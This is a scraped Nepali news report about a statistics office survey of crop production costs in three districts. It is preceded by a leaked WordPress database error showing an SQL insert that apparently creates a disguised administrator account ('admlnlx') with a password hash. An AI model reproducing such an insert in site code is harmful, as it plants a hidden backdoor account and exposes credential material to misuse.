WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4DBxhbYP9GYkk6QcDTkzRXXpM9VoO.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 09:25:42', '', 'admlnlx', 'admlnlx')
बनेपा, १० पुस –
कृषि विकासका लागि योजना तथा नीति निर्माण गर्न र उत्पादन लागत तथ्याङ्क उपलब्ध गराउनका लागि सर्वेक्षण सुरु हुन लागेको छ ।
अनुमानलाई वस्तुपरक बनाउन काभ्रेपलाञ्चोक, सिन्धुपालचोक र दोलखामा सुरु हुन लागेको सर्वेक्षणमा मुख्य बालीको उत्पादन, कृषि सामाग्री तथा श्रमको लागतअनुसार तथ्याङ्क लिन लागिएको काभ्रेपलाञ्चोकका तथ्याङ्क अधिकृत दिनानाथ लम्सालले जानकारी दिनुभयो ।
उहाँका अनुसार धान, मकै, कोदो, फापर बोडी, आलु, तोरीलगायतका उत्पादनको लागत मूल्य सङ्कलन गर्न हिमालबाट सात, पहाडबाट १६ र तराईबाट १५ जिल्ला सर्वेक्षणका लागि छनोट गरिएको छ ।
छनोट भएका प्रत्येक जिल्लामा खेती गरिएको बालीले ढाकेको क्षेत्रको अनुपातमा ग्रामीण, सहरी, व्यावसायिक तथा साना ठूला सबैको प्रतिनिधित्व हुने गरी कृषकको सङ्ख्या निर्धारण गरिएको छ । जसअनुसार हिमालमा २०७, पहाडमा ३८७ र तराईमा ४५५ किसानबाट तथ्याङ्क सङ्कलन गरिने तथ्याङ्क अधिकृत लम्सालको भनाइ छ ।
सर्वेक्षणमा कृषकले कुनै पनि बाली लगाउँदा जमिनको तयारीदेखि बाली भित्र्याउँदासम्म गरिने क्रियाकलापमा हुने विभिन्न खर्चको विवरण सङ्कलन गरिनेछ ।
यस सर्वेक्षणमा विभिन्न खेती गर्ने ३२ सिन्धुपाल्चोकमा ४६ र दोलखामा ४५ कृषक छनोट गरी यही चैतभित्र तथ्याङ्क सङ्कलन गर्ने र आगामी आसारभित्र नतिजा सार्वजकि गर्ने केन्द्रीय तथ्याङ्क विभागको लक्ष्य छ । – रासस